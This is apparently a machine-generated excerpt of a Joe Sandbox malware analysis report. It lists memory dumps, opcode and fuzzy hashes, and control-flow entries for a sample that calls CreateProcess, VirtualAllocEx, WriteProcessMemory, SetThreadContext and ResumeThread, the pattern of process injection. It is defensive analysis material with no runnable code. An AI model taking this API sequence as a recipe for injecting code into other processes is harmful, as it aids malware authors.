                                                            • Opcode Fuzzy Hash: 382370e59da61021f737b2bca0c22bd7b34b4afb68deb828e55392acc2b76247
                                                            • Instruction Fuzzy Hash: 10219231E002169BCB19DF65D440ADEF7B6BF89310F10861EE915FB340DB71A846CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e4602b6c4cb9729bf4147cbb93774c09533178952752ff103002b647b23138a0
                                                            • Instruction ID: 259ebbdf7c3d64c6865927a2af1273c964383551cf3dee2420b88103866ec435
                                                            • Opcode Fuzzy Hash: e4602b6c4cb9729bf4147cbb93774c09533178952752ff103002b647b23138a0
                                                            • Instruction Fuzzy Hash: 5F212A30B00609CFDB64DBB9C6946AE7BF6BF49241F10046DD606EF250EB369D42CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b50e0c18f55061474b0833f54171f207d1d7a1c594ceb50a2a6a15b32755cef8
                                                            • Instruction ID: f11a62d4d9000e598c4ef2eb54f6a568462d90b8fa2e9d15abd341b5acad5ec4
                                                            • Opcode Fuzzy Hash: b50e0c18f55061474b0833f54171f207d1d7a1c594ceb50a2a6a15b32755cef8
                                                            • Instruction Fuzzy Hash: F521FA30B00609CFDB64DBB9C6A56AE7BF6BB89241F10046DD606EF350DB369D41CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7864dfe22facf4d985280d49d70706c599422c7a593e84e6917cdd271c5686fb
                                                            • Instruction ID: 8e91c0df82cc9e59287e6847034d822f5914f43654b6c006a93babb6560179dc
                                                            • Opcode Fuzzy Hash: 7864dfe22facf4d985280d49d70706c599422c7a593e84e6917cdd271c5686fb
                                                            • Instruction Fuzzy Hash: FA219230E002169BCB19CFA9D440ADEB7B6BF89300F10861EF916FB340DB71A845CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 387b1c4e05b90033b175d3c4d8072be1f128012550e0977e95245623ac84ab1a
                                                            • Instruction ID: 66fba8a48e3d942fc821bf90f4cfa46b4c3991128290eeba82bb17c76cd689a7
                                                            • Opcode Fuzzy Hash: 387b1c4e05b90033b175d3c4d8072be1f128012550e0977e95245623ac84ab1a
                                                            • Instruction Fuzzy Hash: 0E21C030600506CBEF25E72DE8C4B5D3B26F784314F10192DE61ACB252DA78DCC5CB91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 107ad86d898e54c9a45aeff19f4185fa236a5b0b14334e79c2cf2ffe50c9f571
                                                            • Instruction ID: 09309d9eaec3bee1eee23d7aae3952ebb885a974a4592e23c6b32ad49b5a2e04
                                                            • Opcode Fuzzy Hash: 107ad86d898e54c9a45aeff19f4185fa236a5b0b14334e79c2cf2ffe50c9f571
                                                            • Instruction Fuzzy Hash: CC21E534710205CFDB58DB79C598AAE77F6FB89305F1044A8E606EB3A4EB359D01CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 416be37df6b0b4d904d4e573215d1ca756f75d2d2541de20a6d0bfa9f54cbd68
                                                            • Instruction ID: 072c9120eedb60ce0e6d3ba18bb6be7d7cce88396eac090b341a2c30a2543e6f
                                                            • Opcode Fuzzy Hash: 416be37df6b0b4d904d4e573215d1ca756f75d2d2541de20a6d0bfa9f54cbd68
                                                            • Instruction Fuzzy Hash: 0B11B172E00656CBCF11AFB888841AEBBF5FF96214F1804BED645EF242E631D8418B91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95143dff86f3932d8b3e5545a19491b4fc7fc8ce569563d7ed39d316fb02f972
                                                            • Instruction ID: 57c19d3143d53cbabdc6937d034b05eaaeaa0aff8f421d3b1a4d96787238f445
                                                            • Opcode Fuzzy Hash: 95143dff86f3932d8b3e5545a19491b4fc7fc8ce569563d7ed39d316fb02f972
                                                            • Instruction Fuzzy Hash: FB113B76F00240DFCF11AB7498842AE7BF5FF4D250F144569E90ADB305EB348942C791
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8890fe0920b94979b2b97e623472dfe409b441be65483ae853976d4e90d93db
                                                            • Instruction ID: cbbe07ac691bdd564ab7a91bdafb1033a06e38a3525e83c118118c4c12a37f99
                                                            • Opcode Fuzzy Hash: a8890fe0920b94979b2b97e623472dfe409b441be65483ae853976d4e90d93db
                                                            • Instruction Fuzzy Hash: FD11B230A042099BEF265A79C54036E3763FB46224F28486DE652CF2C3DA25CC818BD1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b4fe3f71c1595d26a8c079845f9b20e1b4de6b7723f5b74a7286e3f64db3c38
                                                            • Instruction ID: 4ce3f45c13993df89f2f125f0580dd681b6b80be0c49e9655916ed6fd157054d
                                                            • Opcode Fuzzy Hash: 8b4fe3f71c1595d26a8c079845f9b20e1b4de6b7723f5b74a7286e3f64db3c38
                                                            • Instruction Fuzzy Hash: 40114F30B002099BEF156A7EC54476E36A3FB85625F28483DF616CF2C7DA65CC818BD1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3888ffe3d8359193bcf5da62df3e4b6354054bf47ace634cc5e6d06fcc023da2
                                                            • Instruction ID: 78796c2cc966e05483ce58cda1094aa1f191de9853197f6a579aa6386bd2a82d
                                                            • Opcode Fuzzy Hash: 3888ffe3d8359193bcf5da62df3e4b6354054bf47ace634cc5e6d06fcc023da2
                                                            • Instruction Fuzzy Hash: 7311E131605295AFCB16AB7CD4642BE3FB2EFCA300B1048EAD586CB396DA355C45C792
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb53e6ca8645cc70e7fbc4965d446de55eb90292bd2e9eafe0acf1f4cfd7fff2
                                                            • Instruction ID: 875c52348f5158c011af0c4c27db57c8c589867a61b2f49d5040c04efad656cf
                                                            • Opcode Fuzzy Hash: eb53e6ca8645cc70e7fbc4965d446de55eb90292bd2e9eafe0acf1f4cfd7fff2
                                                            • Instruction Fuzzy Hash: E6012D31A00616CBCB21EFB888941AE7BE5FF98214F25047EDA05EB241E631D9418B91
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dad05581bae8ee12d2acaee9dc5a44b4d8100e4e579638d34572be321b68aa62
                                                            • Instruction ID: 689fd0d1822ee3a4d64c92034d2dcb970f78c329b69d7bbc2d2f05f7927653fa
                                                            • Opcode Fuzzy Hash: dad05581bae8ee12d2acaee9dc5a44b4d8100e4e579638d34572be321b68aa62
                                                            • Instruction Fuzzy Hash: 0B01D630A001058BDB14EF69D844B9ABB76FFC4310F548168C94C5F29AEBB0AD46C7E1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ee00df30e549af4e20a7aa6f43809d31908045d084c9ecb370659522b68f2f4
                                                            • Instruction ID: 2f38c0a2879515906a6cd6890b6a5af1b5faab33f896ac304ce051b89c410c06
                                                            • Opcode Fuzzy Hash: 4ee00df30e549af4e20a7aa6f43809d31908045d084c9ecb370659522b68f2f4
                                                            • Instruction Fuzzy Hash: 66018F3090124AEFDB05EBB8F85159D7BB5FB84300F109AACC5029B251EE346E4597A2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fd045964dd5818b7c5e9127485ed815d266bc3fc97d9358bfe282f92fb7aef7
                                                            • Instruction ID: a5fa2acfb1dc154c298b98c1b0025aebeb054fad555de19463fa44c07431bef1
                                                            • Opcode Fuzzy Hash: 6fd045964dd5818b7c5e9127485ed815d266bc3fc97d9358bfe282f92fb7aef7
                                                            • Instruction Fuzzy Hash: D301D675B402088FDB18EB74D558B6C77B2FB8C215F5504A8E5068B2A4CB35AD86CB51
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2215409749.00000000015F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe830ade904e8ff4fede39e0647a414848913ba1af7df3fd4f6adc758b8d1efe
                                                            • Instruction ID: 62cc8fded6c8cbd3a4d5d5e0032a042ec7becf3504fd3eac2a3fddc70eb3b940
                                                            • Opcode Fuzzy Hash: fe830ade904e8ff4fede39e0647a414848913ba1af7df3fd4f6adc758b8d1efe
                                                            • Instruction Fuzzy Hash: 66F08C3090014EDFDB05EBB8F84158C7BB1FB84300F10966CC505AB250EE742E459B91

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:227
                                                            Total number of Limit Nodes:12
                                                            execution_graph

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750CDEE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 61c3740584763133855f0389edd5a1dae17b9bd1fc8b04c2e9636e5ccff7885a
                                                            • Instruction ID: 3f5749f4b39d116ce99d919e4f1cf345181a388d07ccb23fa4761261d7c3ab31
                                                            • Opcode Fuzzy Hash: 61c3740584763133855f0389edd5a1dae17b9bd1fc8b04c2e9636e5ccff7885a
                                                            • Instruction Fuzzy Hash: 71A161B1D00659DFEF11CF68C9417DEBBB2BF45310F14826AE819A7280DB749985CFA1

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750CDEE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 62b8843fa530e0d9df6c0e938e1829b7d5384aadf648ff91d4687af4418cafea
                                                            • Instruction ID: ad1699df551652b3709339ab366bc31c94f24668f6ef1b95dd414904406ea09f
                                                            • Opcode Fuzzy Hash: 62b8843fa530e0d9df6c0e938e1829b7d5384aadf648ff91d4687af4418cafea
                                                            • Instruction Fuzzy Hash: 7C9161B1D00659DFDF11CF68C8417DEBBB2BF49310F14866AE819A7280DB749985CFA1

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CCB386
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 67bc3d2cc7e84591dbc59b830855cb2be9738584c3d9167c5bceb71c9e9ab804
                                                            • Instruction ID: c30983131d782f84faf2126f216574c0c6d23ad8fdb8f8a767457f0b4928034e
                                                            • Opcode Fuzzy Hash: 67bc3d2cc7e84591dbc59b830855cb2be9738584c3d9167c5bceb71c9e9ab804
                                                            • Instruction Fuzzy Hash: 85713470A00B058FD728DFAAD44575ABBF2FF88308F10892ED48AD7A40DB75E945CB90

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CC59C9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 90c1912862467c87d0df752a5aa66e919028f5fcfea2f14734e672572f5a5430
                                                            • Instruction ID: 2eb476bb8d6fc03748badc0cbc0158f3a1be852369f4e4baf0d43b52aebe1317
                                                            • Opcode Fuzzy Hash: 90c1912862467c87d0df752a5aa66e919028f5fcfea2f14734e672572f5a5430
                                                            • Instruction Fuzzy Hash: 2141E3B1C0071DCBDB24CFAAC984B9EBBB5BF88704F60806AD508BB251DB756945CF90

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CC59C9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: a881b06588f5cfd2f878fc0818f6b6ecab61cdfa8263b5185b0002ea206359f9
                                                            • Instruction ID: 70e25ffa1351bd7b6e61b650a9f8bfbb1951b5953a6d79339386fa09f9f91323
                                                            • Opcode Fuzzy Hash: a881b06588f5cfd2f878fc0818f6b6ecab61cdfa8263b5185b0002ea206359f9
                                                            • Instruction Fuzzy Hash: 4B41F0B1C0071DCBDB24CFAAC984BDDBBB5BF88304F60806AD408AB251DB75694ACF50

                                                            Control-flow Graph

                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750C9C0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 2929d5eab87ec61e7465eb6b59ea11c7cbd65e041de7c5cbd3c07ffc7fc4f87f
                                                            • Instruction ID: 8109497f20325f7d7d077ff483b77c04dd0a4345bd8238adf4f87ad28350b6b4
                                                            • Opcode Fuzzy Hash: 2929d5eab87ec61e7465eb6b59ea11c7cbd65e041de7c5cbd3c07ffc7fc4f87f
                                                            • Instruction Fuzzy Hash: C3213CB59003099FDF10CFA9C881BDEBBF5FF48310F10892AE519A7240D779A554CBA4

                                                            Control-flow Graph

                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750C9C0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 48a062d586d5aa7d6e162908ad02663b5ef3ed75e02bbb5d8cf545ba0870da21
                                                            • Instruction ID: f0a55cf973a899cf93e9ddab291a2d0731bf2ada1c407a7672120d7ddb2de776
                                                            • Opcode Fuzzy Hash: 48a062d586d5aa7d6e162908ad02663b5ef3ed75e02bbb5d8cf545ba0870da21
                                                            • Instruction Fuzzy Hash: 572126B1900349DFDB10CFA9C881BDEBBF5FF48310F10882AE958A7240D778A954CBA4

                                                            Control-flow Graph

                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750CAA0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 44cb69de90d8bfe8e1a590acf257f4c998e67aaa597384e2ae2a91635bdfa243
                                                            • Instruction ID: ee1e6b340e3529aa5e19b84eea57e82078d9076c23850abc2177b7ad0dfdec96
                                                            • Opcode Fuzzy Hash: 44cb69de90d8bfe8e1a590acf257f4c998e67aaa597384e2ae2a91635bdfa243
                                                            • Instruction Fuzzy Hash: 782119B19003499FDB10CFAAC841BEEBBF5FF88310F10852AE558A7240D7789510CBA5

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CCD5CE,?,?,?,?,?), ref: 02CCD68F
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: db1ee6c13a37695b57dd8c0d0c99f6bfeb30185e8641b65ff6c95b34ff807c80
                                                            • Instruction ID: 0043feaa9e4aacb5bf177884601fc6c9a5a9ff62a59ea5def1855adde968b2ea
                                                            • Opcode Fuzzy Hash: db1ee6c13a37695b57dd8c0d0c99f6bfeb30185e8641b65ff6c95b34ff807c80
                                                            • Instruction Fuzzy Hash: 1521E5B5900209DFDB10DF9AD984ADEBBF4EB48310F24846AE919A3310D378A950CFA4

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CCD5CE,?,?,?,?,?), ref: 02CCD68F
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 5daa671b31be8051021b50186dc34507878033a58e35f69029022617a27caa61
                                                            • Instruction ID: 6728ef809cf10003d33cecc3dc0b35b0f4750635a55bb4244ca9c9aed563d7c8
                                                            • Opcode Fuzzy Hash: 5daa671b31be8051021b50186dc34507878033a58e35f69029022617a27caa61
                                                            • Instruction Fuzzy Hash: C121E9B5900209DFDB10DF99D584ADEBBF4FB48710F14841AE918A7350D778A954CF64

                                                            Control-flow Graph

                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750C816
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 92079435f272b74d8c8aa67b512e781e6002a37d3799a8825eea7b28c3819392
                                                            • Instruction ID: 96637b39ed2423adab2c9492b2a6c06d15fd433894979270f79fa963e5688039
                                                            • Opcode Fuzzy Hash: 92079435f272b74d8c8aa67b512e781e6002a37d3799a8825eea7b28c3819392
                                                            • Instruction Fuzzy Hash: FD2148B19003098FEB10CFAAC4857EEBBF4BF89320F14852AD519A7240CB789945CFA5

                                                            Control-flow Graph

                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750C816
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0

                                                            Control-flow Graph

                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750CAA0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750C8DE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750C8DE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0A8F031D
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2246154428.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_a8f0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CCB386
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0A8F031D
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2246154428.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_a8f0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
